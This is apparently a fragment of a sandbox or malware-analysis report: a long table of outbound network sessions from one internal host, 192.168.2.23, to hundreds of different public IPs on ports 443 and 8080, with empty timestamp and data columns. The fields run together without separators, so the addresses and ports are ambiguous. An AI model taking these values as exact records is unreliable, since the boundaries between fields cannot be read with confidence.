                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12505192.168.2.2334980144.140.241.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12506192.168.2.234034214.57.197.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12507192.168.2.2344738174.133.22.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12508192.168.2.2360620205.50.109.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12509192.168.2.2354274178.102.189.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12510192.168.2.235992089.11.17.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12511192.168.2.233312292.150.128.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12512192.168.2.2341800223.94.198.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12513192.168.2.2353210138.89.46.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12514192.168.2.2334306202.233.116.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12515192.168.2.2340024114.73.232.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12516192.168.2.2344298103.198.41.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12517192.168.2.234592875.65.72.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12518192.168.2.2350096157.196.28.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12519192.168.2.2357386164.125.200.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12520192.168.2.235901852.248.73.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12521192.168.2.233519477.114.185.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12522192.168.2.235753098.29.229.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12523192.168.2.2352832153.11.190.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12524192.168.2.2339812203.250.21.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12525192.168.2.2338406129.239.27.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12526192.168.2.234973871.105.33.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12527192.168.2.235219081.69.62.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12528192.168.2.2344108175.228.189.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12529192.168.2.23339528.10.220.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12530192.168.2.2335948126.215.219.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12531192.168.2.2352736196.50.163.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12532192.168.2.2347696100.182.193.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12533192.168.2.2347478170.234.250.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12534192.168.2.234482484.91.155.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12535192.168.2.2333330207.208.184.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12536192.168.2.233463470.191.69.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12537192.168.2.235088677.158.103.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12538192.168.2.2347510110.114.56.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12539192.168.2.2334560171.48.182.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12540192.168.2.2357878139.74.86.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12541192.168.2.2347088152.209.11.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12542192.168.2.2342110165.160.30.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12543192.168.2.2356220219.186.105.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12544192.168.2.2339006109.136.79.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12545192.168.2.2333168170.200.2.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12546192.168.2.234520491.27.66.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12547192.168.2.233672688.195.220.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12548192.168.2.234521662.225.71.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12549192.168.2.235967857.86.231.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12550192.168.2.235591849.180.28.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12551192.168.2.2338144136.103.215.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12552192.168.2.233596636.16.113.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12553192.168.2.235143274.115.76.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12554192.168.2.2356360111.162.30.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12555192.168.2.2339258141.54.57.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12556192.168.2.2344544129.218.82.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12557192.168.2.234160857.16.205.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12558192.168.2.2337534148.45.215.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12559192.168.2.235707868.36.255.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12560192.168.2.235131098.135.113.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12561192.168.2.2343432183.141.28.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12562192.168.2.2336658189.42.181.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12563192.168.2.2352866121.228.6.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12564192.168.2.23552685.235.36.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12565192.168.2.234595234.234.136.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12566192.168.2.2338810176.103.146.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12567192.168.2.2334174220.168.35.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12568192.168.2.2349344156.139.98.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12569192.168.2.2349094158.58.27.1108080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12570192.168.2.2335312201.202.79.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12571192.168.2.2355626134.160.226.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12572192.168.2.235044662.173.238.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12573192.168.2.2345706153.163.171.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12574192.168.2.2355268168.172.93.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12575192.168.2.234171680.140.208.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12576192.168.2.2348850109.33.99.208080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12577192.168.2.2336072101.161.46.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12578192.168.2.233902678.21.90.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12579192.168.2.234012825.57.92.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12580192.168.2.2355326108.123.254.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12581192.168.2.2352060222.131.111.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12582192.168.2.2333978181.154.13.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12583192.168.2.2346464157.69.244.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12584192.168.2.234968231.203.183.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12585192.168.2.2350194154.89.51.88080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12586192.168.2.2335420104.16.195.748080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12587192.168.2.2341734200.160.181.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12588192.168.2.2352588208.60.21.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12589192.168.2.2348380149.145.70.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12590192.168.2.235343495.201.241.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12591192.168.2.235506886.243.192.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12592192.168.2.234197452.1.66.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12593192.168.2.2348988213.247.47.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12594192.168.2.2355554103.169.250.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12595192.168.2.2357360119.2.148.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12596192.168.2.233277243.148.127.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12597192.168.2.2349990145.169.255.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12598192.168.2.2335174183.248.204.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12599192.168.2.235255023.84.69.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12600192.168.2.2344916155.250.132.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12601192.168.2.2339670115.242.17.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12602192.168.2.2350938189.221.52.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12603192.168.2.234023060.247.215.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12604192.168.2.2348284118.156.238.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12605192.168.2.2360890111.122.67.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12606192.168.2.2338336204.83.143.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12607192.168.2.233694045.254.143.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12608192.168.2.2352324151.66.255.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12609192.168.2.23497365.187.97.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12610192.168.2.2357278190.19.227.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12611192.168.2.23587589.201.253.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12612192.168.2.2335586138.92.62.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12613192.168.2.233522672.152.247.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12614192.168.2.2333560183.13.5.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12615192.168.2.2357892155.184.1.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12616192.168.2.235053082.117.180.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12617192.168.2.2357742189.13.239.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12618192.168.2.2344474182.20.30.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12619192.168.2.233617081.147.127.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12620192.168.2.2337958142.127.65.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12621192.168.2.233453899.243.63.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12622192.168.2.2339074220.154.185.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12623192.168.2.2335516198.253.112.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12624192.168.2.2335604171.125.140.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12625192.168.2.2348810205.229.124.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12626192.168.2.233307681.152.125.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12627192.168.2.233929243.202.223.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12628192.168.2.2347212178.156.6.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12629192.168.2.2338014152.184.180.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12630192.168.2.235667687.78.1.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12631192.168.2.2359936180.132.2.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12632192.168.2.23487641.84.170.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12633192.168.2.2343912141.35.3.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12634192.168.2.2334626152.251.112.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12635192.168.2.2343126190.64.76.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12636192.168.2.235730240.155.245.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12637192.168.2.234519676.154.34.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12638192.168.2.2347916223.135.203.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12639192.168.2.2335612109.13.1.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12640192.168.2.234959689.100.149.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12641192.168.2.2339658109.247.65.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12642192.168.2.2338464174.48.245.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12643192.168.2.235142232.38.37.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12644192.168.2.2354440191.47.75.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12645192.168.2.2338892176.3.206.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12646192.168.2.233681646.26.60.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12647192.168.2.2359712184.13.134.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12648192.168.2.235991020.132.3.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12649192.168.2.2345628169.55.1.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12650192.168.2.235306235.94.138.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12651192.168.2.2339598112.119.223.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12652192.168.2.2345060104.237.56.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12653192.168.2.2338004110.247.30.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12654192.168.2.2338258131.56.89.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12655192.168.2.234595076.87.76.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12656192.168.2.2350568212.161.114.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12657192.168.2.235178682.153.81.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12658192.168.2.2347082185.134.143.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12659192.168.2.234958289.190.67.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12660192.168.2.233500843.110.41.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12661192.168.2.2339050185.220.14.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12662192.168.2.2348454118.114.197.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12663192.168.2.235295635.174.2.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12664192.168.2.233572480.113.252.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12665192.168.2.2341772216.194.89.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12666192.168.2.2355960201.248.130.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12667192.168.2.2346606157.104.98.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12668192.168.2.235571677.195.211.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12669192.168.2.2358948197.12.133.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12670192.168.2.2358336120.33.188.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12671192.168.2.235135643.137.214.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12672192.168.2.2356694220.21.189.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12673192.168.2.233366285.89.216.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12674192.168.2.2340002196.199.162.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12675192.168.2.235467659.113.65.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12676192.168.2.2345898109.182.11.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12677192.168.2.2359052143.18.84.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12678192.168.2.2353154120.150.50.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12679192.168.2.2348214186.212.106.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12680192.168.2.2357734173.192.239.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12681192.168.2.2345866137.243.166.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12682192.168.2.2350750141.125.131.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12683192.168.2.233739274.219.10.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12684192.168.2.2339942220.64.216.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12685192.168.2.233703486.205.175.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12686192.168.2.233602845.186.250.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12687192.168.2.2340656125.251.232.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12688192.168.2.235130087.203.191.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12689192.168.2.2359842202.2.26.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12690192.168.2.233340281.213.17.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12691192.168.2.2339258211.23.91.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12692192.168.2.233596268.124.65.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12693192.168.2.233880045.135.26.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12694192.168.2.23363769.149.31.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12695192.168.2.2358420207.215.96.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12696192.168.2.2353476177.20.152.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12697192.168.2.2360200138.0.230.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12698192.168.2.236068894.82.71.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12699192.168.2.2345906138.150.142.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12700192.168.2.2333954125.157.171.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12701192.168.2.233618237.25.170.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12702192.168.2.23505781.209.121.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12703192.168.2.2360582199.112.255.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12704192.168.2.235605480.62.50.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12705192.168.2.2359114200.121.225.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12706192.168.2.2358050219.40.51.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12707192.168.2.235175843.57.185.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12708192.168.2.235853252.233.165.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12709192.168.2.2344362139.211.60.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12710192.168.2.2337056181.34.51.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12711192.168.2.23599348.201.11.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12712192.168.2.23492189.182.151.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12713192.168.2.233910679.61.17.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12714192.168.2.2348950210.130.132.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12715192.168.2.2359396107.26.111.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12716192.168.2.233983443.167.56.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12717192.168.2.2342144104.233.108.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12718192.168.2.235747882.16.85.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12719192.168.2.233756012.140.31.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12720192.168.2.2336350170.13.237.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12721192.168.2.2348304199.186.203.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12722192.168.2.234775261.175.191.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12723192.168.2.2336258190.80.100.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12724192.168.2.234944223.200.236.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12725192.168.2.235884094.36.122.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12726192.168.2.2334848191.175.190.8443
